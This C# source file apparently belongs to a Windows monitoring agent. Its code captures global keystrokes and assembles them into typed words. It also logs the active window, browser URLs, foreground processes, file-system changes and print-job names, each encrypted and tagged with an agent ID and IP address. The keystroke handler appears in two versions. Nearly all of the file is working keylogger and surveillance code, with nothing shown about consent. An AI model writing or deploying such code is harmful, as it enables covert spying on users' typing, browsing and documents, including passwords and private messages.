public static void KeyboardListener_KeyDown(object sender, RawKeyEventArgs args)
{
try
{
if (TextHelpers.KeysSanitizer(args.Key.ToString()))
{
KeyboardWord = KeyboardWord + args.Key.ToString();
if (KeyboardWord != String.Empty)
{
if (KeyboardWord.IndexOf("Space") != -1)
{
int index = KeyboardWord.IndexOf("Space");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length > 1 && TextHelpers.WordsSanitizer(KeyboardWord))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info("TextEvent");
}
KeyboardWord = String.Empty;
}
else if (KeyboardWord.IndexOf("Return") != -1)
{
int index = KeyboardWord.IndexOf("Return");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length > 1 && TextHelpers.WordsSanitizer(KeyboardWord))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info("TextEvent");
}
KeyboardWord = String.Empty;
}
else if (KeyboardWord.IndexOf("Tab") != -1)
{
int index = KeyboardWord.IndexOf("Tab");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length > 1 && TextHelpers.WordsSanitizer(KeyboardWord))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info("TextEvent");
}
KeyboardWord = String.Empty;
}
}
}
}
catch { };
}
public static bool WordsSanitizer(string text)
{
string sourceWord = TextHelpers.RemoveDiacritics(text).ToLower();
foreach (string Word in excludeWords)
{
if (sourceWord.IndexOf(Word) == -1)
{
continue;
}
else
{
return(false);
}
}
return(true);
}
public static void BrowserProcess(string process)
{
Process[] ProcessName = Process.GetProcessesByName(process);
if (ProcessName.Length != 0)
{
GetURL(process);
string CurrentURL = GetURL(process);
if (lastURLAccess != CurrentURL && CurrentURL != "")
{
log4net.GlobalContext.Properties["URL"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(CurrentURL));
log4net.GlobalContext.Properties["IPAddress"] = Network.GetAllLocalIPv4(NetworkInterfaceType.Ethernet).FirstOrDefault();
log4net.GlobalContext.Properties["AgentID"] = Settings.AgentID;
log4net.GlobalContext.Properties["BrowserID"] = Cryptography.EncRijndael(process);
logBrowsingURLs.Info("URLEvent");
lastURLAccess = CurrentURL;
}
}
}
public static void LogCurrentWindowInformation()
{
var activeWindowId = NativeMethods.GetForegroundWindow();
if (activeWindowId.Equals(0))
{
return;
}
int processId;
NativeMethods.GetWindowThreadProcessId(activeWindowId, out processId);
if (processId == 0)
{
return;
}
Process foregroundProcess = Process.GetProcessById(processId);
var fileName = string.Empty;
var windowTitle = string.Empty;
try { if (!string.IsNullOrEmpty(foregroundProcess.MainModule.FileName))
{
fileName = foregroundProcess.MainModule.FileName;
}
}
catch (Exception) { }
try { if (!string.IsNullOrEmpty(foregroundProcess.MainWindowTitle))
{
windowTitle = foregroundProcess.MainWindowTitle;
}
}
catch (Exception) { }
try
{
if (string.IsNullOrEmpty(windowTitle))
{
const int Count = 1024;
var sb = new StringBuilder(Count);
NativeMethods.GetWindowText((int)activeWindowId, sb, Count);
windowTitle = sb.ToString();
}
}
catch (Exception) { }
if (lastWindowTitle != windowTitle && windowTitle != "")
{
log4net.GlobalContext.Properties["ProcessId"] = Cryptography.EncRijndael(Convert.ToString(processId));
log4net.GlobalContext.Properties["FileName"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(fileName));
log4net.GlobalContext.Properties["ApplicationWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(windowTitle));
log4net.GlobalContext.Properties["IPAddress"] = Network.GetAllLocalIPv4(NetworkInterfaceType.Ethernet).FirstOrDefault();
log4net.GlobalContext.Properties["AgentID"] = Settings.AgentID;
logWindowTitles.Info("ApplicationEvent");
lastWindowTitle = windowTitle;
}
}
public static void KeyboardListener_KeyDown(object sender, RawKeyEventArgs args)
{
try
{
if (TextHelpers.KeysSanitizer(args.Key.ToString()))
{
KeyboardWord = KeyboardWord + args.Key.ToString();
if (KeyboardWord != String.Empty)
{
if (KeyboardWord.IndexOf("Space") != -1)
{
int index = KeyboardWord.IndexOf("Space");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length >= 1 && TextHelpers.WordsSanitizer(KeyboardWord) && !TextHelpers.AppsExclusion(ActiveApplTitle()))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info(Cryptography.EncRijndael("TextEvent"));
}
KeyboardWord = String.Empty;
}
else if (KeyboardWord.IndexOf("Return") != -1)
{
int index = KeyboardWord.IndexOf("Return");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length >= 1 && TextHelpers.WordsSanitizer(KeyboardWord) && !TextHelpers.AppsExclusion(ActiveApplTitle()))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info(Cryptography.EncRijndael("TextEvent"));
}
KeyboardWord = String.Empty;
}
else if (KeyboardWord.IndexOf("Tab") != -1)
{
int index = KeyboardWord.IndexOf("Tab");
KeyboardWord = KeyboardWord.Substring(0, index);
if (KeyboardWord.Length >= 1 && TextHelpers.WordsSanitizer(KeyboardWord) && !TextHelpers.AppsExclusion(ActiveApplTitle()))
{
log4net.GlobalContext.Properties["TextWindow"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(ActiveApplTitle()));
log4net.GlobalContext.Properties["Word"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(KeyboardWord).ToLower());
logText.Info(Cryptography.EncRijndael("TextEvent"));
}
KeyboardWord = String.Empty;
}
}
}
}
catch (Exception ex)
{
Filesystem.WriteLog("ERROR : Exception trown while processing analytics : " + ex);
}
}
static void fswA_Trigger(object sender, FileSystemEventArgs e)
{
try
{
string ext = Path.GetExtension(e.FullPath).Replace(".", "").ToLower();
if (ext == "")
{
ext = "dir";
}
if (FilesystemHelpers.filterCommonOperations(e.FullPath))
{
log4net.GlobalContext.Properties["FileExtension"] = Cryptography.EncRijndael(ext);
log4net.GlobalContext.Properties["DriveUnit"] = Cryptography.EncRijndael((Path.GetPathRoot(e.FullPath)));
log4net.GlobalContext.Properties["ChangeType"] = Cryptography.EncRijndael(e.ChangeType.ToString());
log4net.GlobalContext.Properties["FullPath"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(e.FullPath));
log4net.GlobalContext.Properties["AgentID"] = Settings.AgentID;
log4net.GlobalContext.Properties["IPAddress"] = Network.GetAllLocalIPv4(NetworkInterfaceType.Ethernet).FirstOrDefault();
logFsw.Info("FilesystemEvent");
}
}
catch { };
}
private void WmiEventHandler(object sender, EventArrivedEventArgs e)
{
currentDocumentName = ((ManagementBaseObject)e.NewEvent.Properties["TargetInstance"].Value)["Document"].ToString();
currentPrinterName = ((ManagementBaseObject)e.NewEvent.Properties["TargetInstance"].Value)["Caption"].ToString();
int index = currentPrinterName.IndexOf(",");
currentPrinterName = currentPrinterName.Substring(0, index);
if (currentDocumentName != lastDocumentName)
{
log4net.GlobalContext.Properties["IPAddress"] = Network.GetAllLocalIPv4(NetworkInterfaceType.Ethernet).FirstOrDefault();
log4net.GlobalContext.Properties["AgentID"] = Settings.AgentID;
log4net.GlobalContext.Properties["printerName"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(currentPrinterName));
log4net.GlobalContext.Properties["documentName"] = Cryptography.EncRijndael(TextHelpers.RemoveDiacritics(currentDocumentName));
logPrinter.Info("PrinterEvent");
}
lastDocumentName = String.Copy(currentDocumentName);
}